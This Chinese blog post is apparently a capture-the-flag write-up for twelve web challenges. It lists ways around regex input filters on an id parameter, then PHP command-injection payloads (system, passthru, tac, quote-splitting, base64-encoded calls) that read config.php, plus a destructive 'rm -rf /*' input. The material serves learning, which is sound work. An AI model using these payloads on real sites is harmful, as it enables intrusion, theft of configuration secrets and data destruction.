

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/blog/img/fluid.png">
  <link rel="icon" href="/blog/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="web1~web7web1 当id&gt;999会报错，但要让id&#x3D;1000,想办法绕过 用?id&#x3D;2 or id&#x3D;1000  web2 web2多了preg_match(“&#x2F;or|+&#x2F;i”,$id）代码，不让用&#x2F;or|+&#x2F;i， 用?id&#x3D;’1000’绕过  web3条件变成了preg_match(“&#x2F;or|">
<meta property="og:type" content="article">
<meta property="og:title" content="学习">
<meta property="og:url" content="https://gchonlinelearners.github.io/blog/2025/02/08/web/index.html">
<meta property="og:site_name" content="学习">
<meta property="og:description" content="web1~web7web1 当id&gt;999会报错，但要让id&#x3D;1000,想办法绕过 用?id&#x3D;2 or id&#x3D;1000  web2 web2多了preg_match(“&#x2F;or|+&#x2F;i”,$id）代码，不让用&#x2F;or|+&#x2F;i， 用?id&#x3D;’1000’绕过  web3条件变成了preg_match(“&#x2F;or|">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://gchonlinelearners.github.io/blog/images/web1-7/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-02-09%20163313.png">
<meta property="og:image" content="https://gchonlinelearners.github.io/blog/images/web1-7/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-02-12%20134725.png">
<meta property="og:image" content="https://gchonlinelearners.github.io/blog/images/web1-7/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-02-12%20134935.png">
<meta property="og:image" content="https://gchonlinelearners.github.io/blog/images/web1-7/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-02-12%20135257.png">
<meta property="og:image" content="https://gchonlinelearners.github.io/blog/images/web1-7/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-02-12%20141418.png">
<meta property="og:image" content="https://gchonlinelearners.github.io/blog/images/web1-7/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-02-12%20141741.png">
<meta property="og:image" content="https://gchonlinelearners.github.io/blog/images/web1-7/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-02-12%20142056.png">
<meta property="og:image" content="d:/images/web1-7/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-02-12%20142801.png">
<meta property="og:image" content="https://gchonlinelearners.github.io/blog/images/web1-7/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-02-12%20143624.png">
<meta property="article:published_time" content="2025-02-08T06:05:28.993Z">
<meta property="article:modified_time" content="2025-02-12T06:41:17.301Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://gchonlinelearners.github.io/blog/images/web1-7/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-02-09%20163313.png">
  
  
  
  <title>学习</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/blog/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/blog/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/blog/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"gchonlinelearners.github.io","root":"/blog/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/blog/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/blog/js/utils.js" ></script>
  <script  src="/blog/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/blog/">
      <strong>学习</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/blog/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/blog/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/blog/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/blog/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/blog/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/blog/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text=""></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-02-08 14:05" pubdate>
          2025年2月8日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          780 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          7 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header"></h1>
            
            
              <div class="markdown-body">
                
                <h5 id="web1-web7"><a href="#web1-web7" class="headerlink" title="web1~web7"></a>web1~web7</h5><h6 id="web1"><a href="#web1" class="headerlink" title="web1"></a>web1</h6><p><img src="/blog/images/web1-7/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-02-09%20163313.png" srcset="/blog/img/loading.gif" lazyload></p>
<p>当id&gt;999会报错，但要让id&#x3D;1000,想办法绕过</p>
<p>用?id&#x3D;2 or id&#x3D;1000</p>
<p><img src="/blog/images/web1-7/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-02-12%20134725.png" srcset="/blog/img/loading.gif" lazyload></p>
<h6 id="web2"><a href="#web2" class="headerlink" title="web2"></a>web2</h6><p><img src="/blog/images/web1-7/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-02-12%20134935.png" srcset="/blog/img/loading.gif" lazyload></p>
<p>web2多了preg_match(“&#x2F;or|+&#x2F;i”,$id）代码，不让用&#x2F;or|+&#x2F;i，</p>
<p>用?id&#x3D;’1000’绕过</p>
<p><img src="/blog/images/web1-7/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-02-12%20135257.png" srcset="/blog/img/loading.gif" lazyload></p>
<h6 id="web3"><a href="#web3" class="headerlink" title="web3"></a>web3</h6><p>条件变成了preg_match(“&#x2F;or|-|\|*|&lt;|&gt;|!|x|hex|+&#x2F;i”,$id)</p>
<p>还用id&#x3D;’1000’</p>
<h6 id="web4"><a href="#web4" class="headerlink" title="web4"></a>web4</h6><p>条件变成了preg_match(“&#x2F;or|-|\|/|\*|&lt;|&gt;|!|x|hex|(|)|+|select&#x2F;i”,$id)</p>
<p>还用id&#x3D;’1000’</p>
<h6 id="web5"><a href="#web5" class="headerlink" title="web5"></a>web5</h6><p>条件变成了preg_match(“&#x2F;&#39;|&quot;|or|||-|\|/|\*|&lt;|&gt;|!|x|hex|(|)|+|select&#x2F;i”,$id)</p>
<p>由于’’被禁了</p>
<p>我们用?id&#x3D;~~1000</p>
<h6 id="web6"><a href="#web6" class="headerlink" title="web6"></a>web6</h6><p>条件变成了preg_match(“&#x2F;&#39;|&quot;|or|||-|\|/|\*|&lt;|&gt;|^|!|x|hex|(|)|+|select&#x2F;i”,$id)</p>
<p>我们用?id&#x3D;~~1000</p>
<h6 id="web7"><a href="#web7" class="headerlink" title="web7"></a>web7</h6><p>条件变成了preg_match(“&#x2F;&#39;|&quot;|or|||-|\|/|\*|&lt;|&gt;|^|!|~|x|hex|(|)|+|select&#x2F;i”,$id)</p>
<p>由于~被禁了</p>
<p>用二进制?id&#x3D;0b1111101000</p>
<p>web1~7方法：</p>
<p>减：?id&#x3D;999- -1</p>
<p>左移运算符：?id&#x3D;500&lt;&lt;1</p>
<p>或运算符：?id&#x3D;999 || id&#x3D;1000</p>
<p>or：?id&#x3D;2 or id&#x3D;1000</p>
<p>乘：?id&#x3D;10*1000</p>
<p>非运算符：?id&#x3D;~~1000</p>
<p>单引号：?id&#x3D;’1000’</p>
<p>二进制：?id&#x3D;0b1111101000</p>
<p>16进制：?id&#x3D;0x3e8</p>
<p>异或：?id&#x3D;328^672</p>
<h5 id="web8-web12"><a href="#web8-web12" class="headerlink" title="web8~web12"></a>web8~web12</h5><h6 id="web8"><a href="#web8" class="headerlink" title="web8"></a>web8</h6><p><img src="/blog/images/web1-7/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-02-12%20141418.png" srcset="/blog/img/loading.gif" lazyload></p>
<p>根据提示?flag&#x3D;rm -rf &#x2F;*</p>
<p>得到flag</p>
<h6 id="web9"><a href="#web9" class="headerlink" title="web9"></a>web9</h6><p><img src="/blog/images/web1-7/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-02-12%20141741.png" srcset="/blog/img/loading.gif" lazyload></p>
<p>直接?c&#x3D;system(‘cat config.php’);再F12查看</p>
<p>得到flag</p>
<h6 id="web10"><a href="#web10" class="headerlink" title="web10"></a>web10</h6><p><img src="/blog/images/web1-7/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-02-12%20142056.png" srcset="/blog/img/loading.gif" lazyload></p>
<p>条件preg_match(“&#x2F;system|exec|highlight&#x2F;i”,$c)</p>
<p>不让用system了，用passthru()和tac,</p>
<p>?c&#x3D;passthru(‘cat config.php’)；再F12查看</p>
<p>得到flag</p>
<h6 id="web11"><a href="#web11" class="headerlink" title="web11"></a>web11</h6><p><img src="D:/images/web1-7/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-02-12%20142801.png" srcset="/blog/img/loading.gif" lazyload></p>
<p>条件preg_match(“&#x2F;system|exec|highlight|cat&#x2F;i”,$c)</p>
<p>不让用cat了，用tac</p>
<p>?c&#x3D;passthru(%22tac%20config.php%22);</p>
<p>得到flag</p>
<h6 id="知识点"><a href="#知识点" class="headerlink" title="知识点"></a>知识点</h6><pre><code class="hljs">?c=passthru(%22tac%20config.php%22);

?c=passthru(%22more%20config.php%22);

?c=passthru(%22less%20config.php%22);

?c=passthru(%22head%20config.php%22);

?c=passthru(%22tail%20config.php%22);

?c=passthru(%22nl%20config.php%22);

?c=passthru(%22sort%20config.php%22);

?c=passthru(%22uniq%20config.php%22);

c=passthru(%22ca%27%27t%20config.php%22);

?c=passthru(%22ca\t%20config.php%22);
cat命令用于连接文件并打印到标准输出设备上。

tac将文件全部内容从尾到头反向连续输出到标准输出(屏幕)上

more 命令类似 cat ，不过会以一页一页的形式显示，更方便使用者逐页阅读，而最基本的指令就是按空白键（space）就往下一页显示，按 b 键就会往回（back）一页显示 

less 与 more 类似，less 可以随意浏览文件，支持翻页和搜索，支持向上翻页和向下翻页。

head 命令可用于查看文件的开头部分的内容，有一个常用的参数 -n 用于显示行数，默认为 10，即显示 10 行的内容。

tail 命令可用于查看文件的内容，有一个常用的参数 -f 常用于查阅正在改变的日志文件。

head 命令可用于查看文件的开头部分的内容，有一个常用的参数 -n 用于显示行数，默认为 10，即显示 10 行的内容。

sort 命令用于将文本文件内容加以排序。

nl命令在linux系统中用来计算文件中行号

uniq 可检查文本文件中重复出现的行列

Linux中，`` 作用是优先执行里面的内容，再把里面的内容传给外面的语句
原文链接：https://blog.csdn.net/qq_41274349/article/details/123707765
</code></pre>
<h6 id="web12"><a href="#web12" class="headerlink" title="web12"></a>web12</h6><p><img src="/blog/images/web1-7/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-02-12%20143624.png" srcset="/blog/img/loading.gif" lazyload></p>
<p>条preg_match(“&#x2F;system|exec|highlight|cat|.|php|config&#x2F;i”,$c)</p>
<p>不让用php了对config和php进行过滤，可以base64编码绕过，?c&#x3D;$a&#x3D;base64_decode(%22c3lzdGVt%22);$b&#x3D;base64_decode(%22Y2F0IGNvbmZpZy5waHA&#x3D;%22);$a($b);</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div></div>
      <div>https://gchonlinelearners.github.io/blog/2025/02/08/web/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年2月8日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/blog/2025/02/08/misc1/" title="">
                        <span class="hidden-mobile"></span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/blog/js/events.js" ></script>
<script  src="/blog/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/blog/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/blog/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/blog/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
